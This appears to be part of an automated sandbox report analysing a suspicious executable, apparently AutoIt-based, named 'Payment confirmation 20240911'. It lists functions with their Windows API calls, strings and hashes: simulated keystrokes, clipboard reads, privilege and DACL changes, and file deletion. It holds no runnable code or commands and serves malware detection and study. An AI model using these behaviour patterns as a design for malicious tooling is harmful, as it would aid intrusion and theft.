                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 013543F2
                                          • SetForegroundWindow.USER32(000000FF), ref: 013543F5
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0135440A
                                          • keybd_event.USER32 ref: 01354415
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0135441F
                                          • keybd_event.USER32 ref: 01354424
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0135442D
                                          • keybd_event.USER32 ref: 01354432
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0135443C
                                          • keybd_event.USER32 ref: 01354441
                                          • SetForegroundWindow.USER32(000000FF), ref: 01354444
                                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0135446B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: 50007e889fba81e836864b070a9020f6a72231dfb69f858054811649f4f2310b
                                          • Instruction ID: 2126a8cee9130bd886016021d6b1649d4bd1bc87e28e0ef02ea36e276266ebf2
                                          • Opcode Fuzzy Hash: 50007e889fba81e836864b070a9020f6a72231dfb69f858054811649f4f2310b
                                          • Instruction Fuzzy Hash: 973183B1B80218BBEB315BB59C49F7F7E6CEB44B54F108015FB05EA1D1D6B05941ABA0
                                          Function 012EBDF0 Relevance: 35.6, APIs: 12, Strings: 8, Instructions: 643COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,013A22E8,?,00000000,?,012E3E2E,?,00000000,?,0137DBF0,00000000,?), ref: 012EBE8B
                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,012E3E2E,?,00000000,?,0137DBF0,00000000,?,00000002), ref: 012EBEA7
                                          • __wsplitpath.LIBCMT ref: 012EBF19
                                            • Part of subcall function 0130297D: __wsplitpath_helper.LIBCMT ref: 013029BD
                                          • _wcscpy.LIBCMT ref: 012EBF31
                                          • _wcscat.LIBCMT ref: 012EBF46
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 012EBF56
                                          • _wcscpy.LIBCMT ref: 012EC03E
                                          • _wcscpy.LIBCMT ref: 012EC1ED
                                          • SetCurrentDirectoryW.KERNEL32 ref: 012EC250
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                            • Part of subcall function 012EC320: _memmove.LIBCMT ref: 012EC419
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                          • API String ID: 2542276039-689609797
                                          • Opcode ID: eb0f4f95fec1932243d3afb29ee9cdaf65fe78ff62850b5f149296852480e7be
                                          • Instruction ID: 9aa479a95a4b3045142a482622b4f8cb06cebeef433c4ed174b4fea9e658c85b
                                          • Opcode Fuzzy Hash: eb0f4f95fec1932243d3afb29ee9cdaf65fe78ff62850b5f149296852480e7be
                                          • Instruction Fuzzy Hash: F842E0715183469FD711EFA4C844BAFBBE8BF95348F40482DE98987291EB30E518CB93
                                          Function 0131B9F1 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0131BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0131BF0F
                                            • Part of subcall function 0131BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0131BF3C
                                            • Part of subcall function 0131BEC3: GetLastError.KERNEL32 ref: 0131BF49
                                          • _memset.LIBCMT ref: 0131BA34
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0131BA86
                                          • CloseHandle.KERNEL32(?), ref: 0131BA97
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0131BAAE
                                          • GetProcessWindowStation.USER32 ref: 0131BAC7
                                          • SetProcessWindowStation.USER32 ref: 0131BAD1
                                          • OpenDesktopW.USER32 ref: 0131BAEB
                                            • Part of subcall function 0131B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0131B9EC), ref: 0131B8C5
                                            • Part of subcall function 0131B8B0: CloseHandle.KERNEL32(?), ref: 0131B8D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: 5267208ad66c9f6293f4bdfa8c30d50d6c5501f7da7eecb66276d4d1e055a813
                                          • Instruction ID: cff3c1acf72afb8f404b9f5af47ed26d9fae22072aac278bc7d9955af27563e8
                                          • Opcode Fuzzy Hash: 5267208ad66c9f6293f4bdfa8c30d50d6c5501f7da7eecb66276d4d1e055a813
                                          • Instruction Fuzzy Hash: DC816C71900249EFEF159FE9CD44AEEBBBDFF08308F048559FA55A6168DB318A14DB20
                                          Function 01326B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 012E31DA
                                            • Part of subcall function 01327B9F: __wsplitpath.LIBCMT ref: 01327BBC
                                            • Part of subcall function 01327B9F: __wsplitpath.LIBCMT ref: 01327BCF
                                            • Part of subcall function 01327C0C: GetFileAttributesW.KERNEL32(?,01326A7B), ref: 01327C0D
                                          • _wcscat.LIBCMT ref: 01326B9D
                                          • _wcscat.LIBCMT ref: 01326BBB
                                          • __wsplitpath.LIBCMT ref: 01326BE2
                                          • FindFirstFileW.KERNEL32(?,?), ref: 01326BF8
                                          • _wcscpy.LIBCMT ref: 01326C57
                                          • _wcscat.LIBCMT ref: 01326C6A
                                          • _wcscat.LIBCMT ref: 01326C7D
                                          • lstrcmpiW.KERNEL32(?,?), ref: 01326CAB
                                          • DeleteFileW.KERNEL32(?), ref: 01326CBC
                                          • MoveFileW.KERNEL32 ref: 01326CDB
                                          • MoveFileW.KERNEL32 ref: 01326CEA
                                          • CopyFileW.KERNEL32 ref: 01326CFF
                                          • DeleteFileW.KERNEL32(?), ref: 01326D10
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 01326D37
                                          • FindClose.KERNEL32(00000000), ref: 01326D53
                                          • FindClose.KERNEL32(00000000), ref: 01326D61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1867810238-1173974218
                                          • Opcode ID: 2f6999275aac0f62800ae5117c9c942b582edb6250484cb07d81495a19368580
                                          • Instruction ID: 8101f1bb296c25085ecedbcd597a2a41878a794c5f3563efceb8a9760c42433c
                                          • Opcode Fuzzy Hash: 2f6999275aac0f62800ae5117c9c942b582edb6250484cb07d81495a19368580
                                          • Instruction Fuzzy Hash: 1D512FB290016DAADF21EBA4DC95EEE77BCBF19308F4445D6D549A3041DB309B88CFA1
                                          Function 01337099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenClipboard.USER32(0137DBF0), ref: 013370C3
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 013370D1
                                          • GetClipboardData.USER32 ref: 013370D9
                                          • CloseClipboard.USER32 ref: 013370E5
                                          • GlobalLock.KERNEL32(00000000), ref: 01337101
                                          • CloseClipboard.USER32 ref: 0133710B
                                          • GlobalUnlock.KERNEL32(00000000), ref: 01337120
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0133712D
                                          • GetClipboardData.USER32 ref: 01337135
                                          • GlobalLock.KERNEL32(00000000), ref: 01337142
                                          • GlobalUnlock.KERNEL32(00000000), ref: 01337176
                                          • CloseClipboard.USER32 ref: 01337283
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                          • String ID:
                                          • API String ID: 3222323430-0
                                          • Opcode ID: 551f2ab0095b502cddcd2f152f0597c518e9b2e0814637b85b19bdd81fc53c0e
                                          • Instruction ID: 414872ccafa2a6642248c43083b2531074cc6c88b97adc77b787668e19c0618e
                                          • Opcode Fuzzy Hash: 551f2ab0095b502cddcd2f152f0597c518e9b2e0814637b85b19bdd81fc53c0e
                                          • Instruction Fuzzy Hash: 3A51C071304206ABD321EFA4CC99F7E77A8AB98B15F404519F686D61E0EB71D8058B62
                                          Function 0132FDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0132FE03
                                          • FindClose.KERNEL32(00000000), ref: 0132FE57
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0132FE7C
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0132FE93
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0132FEBA
                                          • __swprintf.LIBCMT ref: 0132FF06
                                          • __swprintf.LIBCMT ref: 0132FF3F
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • __swprintf.LIBCMT ref: 0132FF93
                                            • Part of subcall function 0130234B: __woutput_l.LIBCMT ref: 013023A4
                                          • __swprintf.LIBCMT ref: 0132FFE1
                                          • __swprintf.LIBCMT ref: 01330030
                                          • __swprintf.LIBCMT ref: 0133007F
                                          • __swprintf.LIBCMT ref: 013300CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 108614129-2428617273
                                          • Opcode ID: 5c739c3390187d1815a6cb3faa10e5c6b4ce96ed7e8a557112db7eee41e39661
                                          • Instruction ID: 1f6e7b90b34edf211d04ee8e577b200388981ecb8d2a4a2011b22a5eb0573115
                                          • Opcode Fuzzy Hash: 5c739c3390187d1815a6cb3faa10e5c6b4ce96ed7e8a557112db7eee41e39661
                                          • Instruction Fuzzy Hash: 8FA11DB2418345ABC315EFA4C894DBFB7ECAFA4704F84491DF585C6190EB34E948CBA2
                                          Function 01332044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 01332065
                                          • _wcscmp.LIBCMT ref: 0133207A
                                          • _wcscmp.LIBCMT ref: 01332091
                                          • GetFileAttributesW.KERNEL32(?), ref: 013320A3
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 013320BD
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 013320D5
                                          • FindClose.KERNEL32(00000000), ref: 013320E0
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 013320FC
                                          • _wcscmp.LIBCMT ref: 01332123
                                          • _wcscmp.LIBCMT ref: 0133213A
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0133214C
                                          • SetCurrentDirectoryW.KERNEL32(01393A68), ref: 0133216A
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 01332174
                                          • FindClose.KERNEL32(00000000), ref: 01332181
                                          • FindClose.KERNEL32(00000000), ref: 01332191
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: d099c3d9d7a9ebf1b3a695299319439d71e4a428f924a7549529ae7036599445
                                          • Instruction ID: 606a1b477d957b3711d266e3851f2a0f3b52891a5d3c69877181b04aba8a7b7f
                                          • Opcode Fuzzy Hash: d099c3d9d7a9ebf1b3a695299319439d71e4a428f924a7549529ae7036599445
                                          • Instruction Fuzzy Hash: 2D31A675A00219BAEF20EBF9DD48EDF77ECAF85268F104056EA11E3190DB74DA44CB64
                                          Function 0133219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 013321C0
                                          • _wcscmp.LIBCMT ref: 013321D5
                                          • _wcscmp.LIBCMT ref: 013321EC
                                            • Part of subcall function 01327606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 01327621
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0133221B
                                          • FindClose.KERNEL32(00000000), ref: 01332226
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 01332242
                                          • _wcscmp.LIBCMT ref: 01332269
                                          • _wcscmp.LIBCMT ref: 01332280
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01332292
                                          • SetCurrentDirectoryW.KERNEL32(01393A68), ref: 013322B0
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 013322BA
                                          • FindClose.KERNEL32(00000000), ref: 013322C7
                                          • FindClose.KERNEL32(00000000), ref: 013322D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: 08a2464bfffaaf385445fe384d8b69c07c815c1c730f9ca6dd368dde458f8b00
                                          • Instruction ID: eb6b47f74cb4e024c4aa40010be1772f92b2c4523a8e3b0185f67697fc7143df
                                          • Opcode Fuzzy Hash: 08a2464bfffaaf385445fe384d8b69c07c815c1c730f9ca6dd368dde458f8b00
                                          • Instruction Fuzzy Hash: 7731E631A0121A6AEF61EFF8DC48EDF77ACAF9522CF104155E910E2190DB70DA85CB68
                                          Function 012E6BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove_memset
                                          • String ID: Q\E$[$\$\$\$]$^
                                          • API String ID: 3555123492-286096704
                                          • Opcode ID: ebbea73eb9fff8de326fc81a600f89d89b533947494df1d8104b0d9806f7f613
                                          • Instruction ID: e8bd442327b1e64888fd67bafe00b1f84944f46a954a54637dfbeedb39acfa91
                                          • Opcode Fuzzy Hash: ebbea73eb9fff8de326fc81a600f89d89b533947494df1d8104b0d9806f7f613
                                          • Instruction Fuzzy Hash: 1272C071D2021ACBDF28CF98C8856ADBBF5FF54318F5481A9D915AB381D374AE80CB90
                                          Function 0131B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0131B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0131B903
                                            • Part of subcall function 0131B8E7: GetLastError.KERNEL32(?,0131B3CB,?,?,?), ref: 0131B90D
                                            • Part of subcall function 0131B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0131B3CB,?,?,?), ref: 0131B91C
                                            • Part of subcall function 0131B8E7: HeapAlloc.KERNEL32(00000000,?,0131B3CB,?,?,?), ref: 0131B923
                                            • Part of subcall function 0131B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0131B93A
                                            • Part of subcall function 0131B982: GetProcessHeap.KERNEL32(00000008,0131B3E1,00000000,00000000,?,0131B3E1,?), ref: 0131B98E
                                            • Part of subcall function 0131B982: HeapAlloc.KERNEL32(00000000,?,0131B3E1,?), ref: 0131B995
                                            • Part of subcall function 0131B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0131B3E1,?), ref: 0131B9A6
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0131B3FC
                                          • _memset.LIBCMT ref: 0131B411
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0131B430
                                          • GetLengthSid.ADVAPI32(?), ref: 0131B441
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0131B47E
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0131B49A
                                          • GetLengthSid.ADVAPI32(?), ref: 0131B4B7
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0131B4C6
                                          • HeapAlloc.KERNEL32(00000000), ref: 0131B4CD
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0131B4EE
                                          • CopySid.ADVAPI32(00000000), ref: 0131B4F5
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0131B526
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0131B54C
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0131B560
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 0f4ae9c003889d61da6210fc7ad31efc0d5579d33f8a5d916a12dd7f0d281f84
                                          • Instruction ID: 0c12c9df457702ed920f816a139a23e64216af996fafb6706a0118e1793f82c2
                                          • Opcode Fuzzy Hash: 0f4ae9c003889d61da6210fc7ad31efc0d5579d33f8a5d916a12dd7f0d281f84
                                          • Instruction Fuzzy Hash: C6512C71A0020AEFDF14DFA9D844AEEBB79FF04714F048129E915A7298DB35DA15CF60
                                          Function 01326E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 012E31DA
                                            • Part of subcall function 01327C0C: GetFileAttributesW.KERNEL32(?,01326A7B), ref: 01327C0D
                                          • _wcscat.LIBCMT ref: 01326E7E
                                          • __wsplitpath.LIBCMT ref: 01326E99
                                          • FindFirstFileW.KERNEL32(?,?), ref: 01326EAE
                                          • _wcscpy.LIBCMT ref: 01326EDD
                                          • _wcscat.LIBCMT ref: 01326EEF
                                          • _wcscat.LIBCMT ref: 01326F01
                                          • DeleteFileW.KERNEL32(?), ref: 01326F0E
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 01326F22
                                          • FindClose.KERNEL32(00000000), ref: 01326F3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                          • String ID: \*.*
                                          • API String ID: 2643075503-1173974218
                                          • Opcode ID: 225296647f0a196c24584edd6bc19e1edf021267184c218a0978082e02739c99
                                          • Instruction ID: e8001ca82be7d0f3720ebbdfe6f92bd145b134d72f84f2650af9d159f4ac487c
                                          • Opcode Fuzzy Hash: 225296647f0a196c24584edd6bc19e1edf021267184c218a0978082e02739c99
                                          • Instruction Fuzzy Hash: 6821D5B2409345AEC711EBA8C884DDFBBDCAF99218F444E1AF9D4C3041EB30D24D87A2
                                          Function 012E5D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                          • API String ID: 0-2893523900
                                          • Opcode ID: 8bcdf1c555b5afbd1327aee35e992d60dfe91e10c8645097612e6c9d96d050d5
                                          • Instruction ID: aaec50052261d018a893f8407e5458548d7eb47fd9c040349eab7263046e9a55
                                          • Opcode Fuzzy Hash: 8bcdf1c555b5afbd1327aee35e992d60dfe91e10c8645097612e6c9d96d050d5
